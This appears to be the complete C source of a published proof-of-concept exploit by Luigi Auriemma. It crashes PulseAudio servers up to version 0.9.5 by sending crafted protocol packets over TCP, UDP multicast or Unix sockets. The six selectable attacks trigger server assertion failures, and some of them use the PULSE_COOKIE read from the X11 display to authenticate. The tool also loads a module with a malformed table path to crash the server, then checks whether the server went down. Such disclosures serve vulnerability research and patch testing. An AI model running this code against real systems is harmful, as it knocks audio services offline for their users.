/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "pulsex.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close       closesocket
    #define sleep       Sleep
    #define usleep(x)   sleep(x / 1000)
    #define ONESEC      1000
    typedef uint32_t    in_addr_t;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/times.h>
    #include <sys/un.h>
    #include <fcntl.h>
    #include <X11/Xlib.h>           // -lX11
    #include <X11/Xatom.h>

    #define ONESEC      1
#endif



#define VER                     "0.1"
#define BUFFSZ                  FRAME_SIZE_MAX_ALLOW
#define PA_LENGTH               ntohl(pa[PA_PSTREAM_DESCRIPTOR_LENGTH])
#define PA_STREAM(A,B,C,D,E)    pa[PA_PSTREAM_DESCRIPTOR_LENGTH]    = htonl(A); \
                                pa[PA_PSTREAM_DESCRIPTOR_CHANNEL]   = htonl(B); \
                                pa[PA_PSTREAM_DESCRIPTOR_OFFSET_HI] = htonl(C); \
                                pa[PA_PSTREAM_DESCRIPTOR_OFFSET_LO] = htonl(D); \
                                pa[PA_PSTREAM_DESCRIPTOR_FLAGS]     = htonl(E);



int getxx(uint8_t *data, uint32_t *ret, int bits);
int putxx(uint8_t *data, uint32_t num, int bits);
int putmm(uint8_t *data, uint8_t *val, int len);
int tcp_send(int sd, uint8_t *data, int size);
int tcp_recv(int sd, uint8_t *data, int len);
int get_endian(void);
int rndxx(uint8_t *data, int len);
in_addr_t resolv(char *host);
void std_err(void);



#ifndef WIN32
int unix_socket_check(char *fname, struct sockaddr_un *peeru) {
    int     sd,
            ret     = 0;

    sprintf(peeru->sun_path, "%.*s", 108, fname);
    peeru->sun_family = AF_UNIX;
    printf("- check %s\n", peeru->sun_path);
    sd = socket(AF_UNIX, SOCK_STREAM, 0);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)peeru, sizeof(struct sockaddr_un))
      < 0) ret = -1;
    close(sd);
    return(ret);
}

    /* directly from Pulseaudio */
char* pa_x11_get_prop(Display *d, const char *name, char *p, size_t l) {
    Atom actual_type;
    int actual_format;
    unsigned long nitems;
    unsigned long nbytes_after;
    unsigned char *prop = NULL;
    char *ret = NULL;

    Atom a = XInternAtom(d, name, False);
    if (XGetWindowProperty(d, RootWindow(d, 0), a, 0, (l+2)/4, False, XA_STRING, &actual_type, &actual_format, &nitems, &nbytes_after, &prop) != Success)
        goto finish;

    if (actual_type != XA_STRING) goto finish;

    memcpy(p, prop, nitems);
    p[nitems] = 0;
    ret = p;
finish:
    if (prop) XFree(prop);
    return ret;
}
#endif



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int         sd,
                i,
                n,
                cnt     = 0,
                attack,
                chans   = 1,        // max 32
                freq    = 22050,
                tcp     = 1;
    uint32_t    pa[PA_PSTREAM_DESCRIPTOR_MAX];
    uint16_t    port    = PA_NATIVE_DEFAULT_PORT;
    uint8_t     cookie[256],
                *buff,
                *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#else
    struct  sockaddr_un peeru;
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Pulseaudio <= 0.9.5 (rev 1437) termination "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host*> [port(%hu)]\n"
            "\n"
            "Attack:\n"
            "1 = do_read: Assertion `p->export' failed.\n"
            "2 = pa_memblock_new: Assertion `length > 0' failed.\n"
            "3 = pa_sdp_parse: Assertion `t' failed. (use host 224.0.0.56!)\n"
            "4 = pa_memblockq_new: Assertion `maxlength >= base' failed (needs auth!)\n"
            "5 = pa_xmalloc: Assertion `size < (1024*1024*20)' failed   (needs auth!)\n"
            "6 = play a small sound (crash also a module in 0.9.5)      (needs auth!)\n"
            "\n"
            "* on *nix you can also specify the name of Unix socket to use like\n"
            "  /tmp/pulse-$USERNAME$/native or /tmp/pulse/native\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);
    if((attack <= 0) || (attack >= 7)) {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    if(attack == 3) {
        port = 9875;
        if(argc > 3) port = atoi(argv[3]);
        peer.sin_addr.s_addr = resolv(argv[2]);
        peer.sin_port        = htons(port);
        peer.sin_family      = AF_INET;

        printf("- connect to %s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        if(sendto(sd, "", 0, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        close(sd);
        printf("- check if the server is up manually\n");
        return(0);
    }

#ifndef WIN32
    if(!unix_socket_check(argv[2], &peeru)) tcp = 0;
#endif
    if(tcp && strchr(argv[2], '/')) {
        printf("\nError: the host seems a Unix file but it doesn't exist\n");
        exit(1);
    }

    if(tcp) {
        if(argc > 3) port = atoi(argv[3]);
        peer.sin_addr.s_addr = resolv(argv[2]);
        peer.sin_port        = htons(port);
        peer.sin_family      = AF_INET;

        printf("- connect to %s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
#ifndef WIN32
    } else {
        printf("- open %s\n", peeru.sun_path);
        sd = socket(AF_UNIX, SOCK_STREAM, 0);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peeru, sizeof(struct sockaddr_un))
          < 0) std_err();
#endif
    }

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(attack == 1) {
        PA_STREAM(FRAME_SIZE_MAX_ALLOW, 0, 0, 0, PA_FLAG_SHMRELEASE);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
    }

    if(attack == 2) {
        PA_STREAM(0, 0, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
    }

    /*
    the following code is a full working player
    I wrote it for testing other possible bugs
    and I have preferred to leave it here as is.
    it's very useful if you want to understand
    how to play audio data through sockets
    */

    if(attack >= 4) {
        if(attack == 5) freq = -1;

#ifdef WIN32
        printf("- you need to manually load a cookie, I will continue with one filled by zeroes which will fail for sure\n");
        memset(cookie, 0, sizeof(cookie));
#else
        printf("- get and try with the current PULSE_COOKIE\n");
        Display     *d;
        d = XOpenDisplay(NULL);
        if(!d) std_err();
        if(!pa_x11_get_prop(d, "PULSE_COOKIE", buff, BUFFSZ)) std_err();
        for(i = 0; i < 256; i++) {
            sscanf(buff + (i << 1), "%02x", &n);
            cookie[i] = n;
        }
#endif

            /* LOGIN */

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_AUTH,      32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,                32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_PROTOCOL_VERSION,  32);
        p += putxx(p, PA_TAG_ARBITRARY,     8); p += putxx(p, sizeof(cookie),       32);
        p += putmm(p, cookie, sizeof(cookie));

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;

            /* SEND PLAYER NAME */

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_SET_CLIENT_NAME,   32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,                32);
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "name_of_the_player");

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;

            /* INITIALIZE THE DEVICE*/

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_CREATE_PLAYBACK_STREAM, 32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,                32);
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "name_of_the_file");
        p += putxx(p, PA_TAG_SAMPLE_SPEC,   8);
            p += putxx(p, 3, 8);            p += putxx(p, chans, 8);    p += putxx(p, freq, 32);
        p += putxx(p, PA_TAG_CHANNEL_MAP,   8); p += putxx(p, chans,    8);
            for(i = 0, n = p[-1]; i < n; i++)   p += putxx(p, 0,        8);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, -1,       32);    // sink_index
        p += putxx(p, PA_TAG_STRING_NULL,   8);
        if(attack == 4) {
            p += putxx(p, PA_TAG_U32,       8); p += putxx(p, 1,        32);    // maxlength
        } else {
            p += putxx(p, PA_TAG_U32,       8); p += putxx(p, BUFFSZ,   32);    // maxlength
        }
        p += putxx(p, PA_TAG_BOOLEAN_FALSE, 8);                                 // corked
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, -1,       32);    // tlength
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, -1,       32);    // prebuf
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, -1,       32);    // minreq
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, 0,        32);    // syncid
        p += putxx(p, PA_TAG_CVOLUME,       8); p += putxx(p, chans,    8);
            for(i = 0, n = p[-1]; i < n; i++)   p += putxx(p, 0x10000,  32);

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;

            /* RAW AUDIO DATA */

        p = buff;   // some funny audio data
        for(i = 0; i < 10000; i++) *p++ = i & 0xff;
        for(i = 0; i < 10000; i++) *p++ = i & 0x7f;
        for(i = 0; i < 10000; i++) *p++ = i & 0x3f;
        for(i = 0; i < 10000; i++) *p++ = i & 0x1f;

        PA_STREAM(p - buff, 0, 0, 0, 0);    // channel (max chans - 1)

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

            /* PLAY IT */

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_DRAIN_PLAYBACK_STREAM, 32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,    32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, 0,        32);    // index

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;

            /* DELETE THE STREAM */

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_DELETE_PLAYBACK_STREAM, 32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,    32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, 0,        32);

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;

        /*
        here you can test possible bugs in all the
        modules loadable by the pulseaudio server
        I had no luck with directory traversal and
        no luck with bugged modules except
        module-volume-restore which causes a crash
        in pa_hook_slot_free when a wrong table
        file is loaded:
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "module-volume-restore");
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "table=/bin/sh");
        */

        p = buff;
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, PA_COMMAND_LOAD_MODULE, 32);
        p += putxx(p, PA_TAG_U32,           8); p += putxx(p, cnt++,    32);
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "module-volume-restore");
        p += putxx(p, PA_TAG_STRING,        8); p += 1 + sprintf(p, "table=/dev/sh");

        PA_STREAM(p - buff, -1, 0, 0, 0);

        if(tcp_send(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_send(sd, buff,               p - buff)                   < 0) goto error;

        if(tcp_recv(sd, (void *)&pa,        PA_PSTREAM_DESCRIPTOR_SIZE) < 0) goto error;
        if(tcp_recv(sd, buff,               PA_LENGTH)                  < 0) goto error;
    }

    sleep(ONESEC);
    close(sd);
    printf("- check if the server is still up:\n");
    sleep(ONESEC);

    if(tcp) {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        n = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
#ifndef WIN32
    } else {
        sd = socket(AF_UNIX, SOCK_STREAM, 0);
        if(sd < 0) std_err();
        n = connect(sd, (struct sockaddr *)&peeru, sizeof(struct sockaddr_un));
#endif
    }

    if(n < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }

    close(sd);
    return(0);
error:
    close(sd);
    printf("\nError: connection lost\n");
    return(1);
}



int getxx(uint8_t *data, uint32_t *ret, int bits) {
    uint32_t    num;
    int         i,
                bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - i - 1) << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(uint8_t *data, uint32_t num, int bits) {
    int         i,
                bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = num >> ((bytes - i - 1) << 3);
    }

    return(bytes);
}



int putmm(uint8_t *data, uint8_t *val, int len) {
    memcpy(data, val, len);
    return(len);
}



int get_endian(void) {
    int     endian = 1;

    if(*(char *)&endian) endian = 0;
    return(endian);
}



int tcp_send(int sd, uint8_t *data, int size) {
    return(send(sd, data, size, 0));
}



int tcp_recv(int sd, uint8_t *data, int size) {
    int     t;

    while(size) {
        t = recv(sd, data, size, 0);
        if(t <= 0) return(-1);
        data += t;
        size -= t;
    }
    return(0);
}



int rndxx(uint8_t *data, int len) {
    uint32_t    rnd;
    uint8_t     *p = data;
    const static uint8_t table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = time(NULL);

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p++ = 0;

    return(p - data);

/* format string test
    int i;
    for(i = 0; i < (len - 1); i++) {
        *data++ = (i & 1) ? 'n' : '%';
    }
    *data++ = 0;

    return(len);
*/
}



in_addr_t resolv(char *host) {
    struct      hostent *hp;
    in_addr_t   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(in_addr_t *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


